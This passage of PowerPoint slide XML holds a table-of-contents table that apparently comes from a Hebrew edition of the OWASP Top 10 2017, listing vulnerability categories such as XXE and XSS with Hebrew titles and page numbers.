                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId20" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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8"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A4:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	XML External Entities (XXE) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId21" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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9"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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בקרת גישה שבורה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId22" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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10"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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ניהול תצורה לא מאובטח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId23" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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11"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A7:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	Cross-Site Scripting (XSS) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId24" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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12"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A8:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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...........פתיחה לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId25" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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13"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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A9:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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שימוש ברכיבים בעלי פגיעויות ידועות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId26" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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14"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1"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A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" kern="1200" baseline="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he-IL"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תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" baseline="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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId27" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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15"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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מה הדבר הבא עבור מפתחים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId28" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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16"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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מה הדבר הבא עבור בודקי תוכנה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId29" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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17"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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מה הדבר הבא עבור ארגונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId30" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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18"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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מה הדבר הבא עבור מנהלי מערכות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId31" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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19"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+R</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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הערה בנוגע לסיכונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId32" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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20"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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en-US" sz="950" b="1"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+RF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL"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מידע אודות גורמי סיכון</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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he-IL"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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950"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txBody>
                  <a:tcPr marR="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defTabSz="90000">
                        <a:tabLst>
                          <a:tab pos="151200" algn="r"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId33" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="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21"/>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tab pos="540000" algn="r"/>
                          <a:tab pos="558000" algn="l"/>
                          <a:tab pos="630000" algn="l"/>
                          <a:tab pos="2908800" algn="r"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
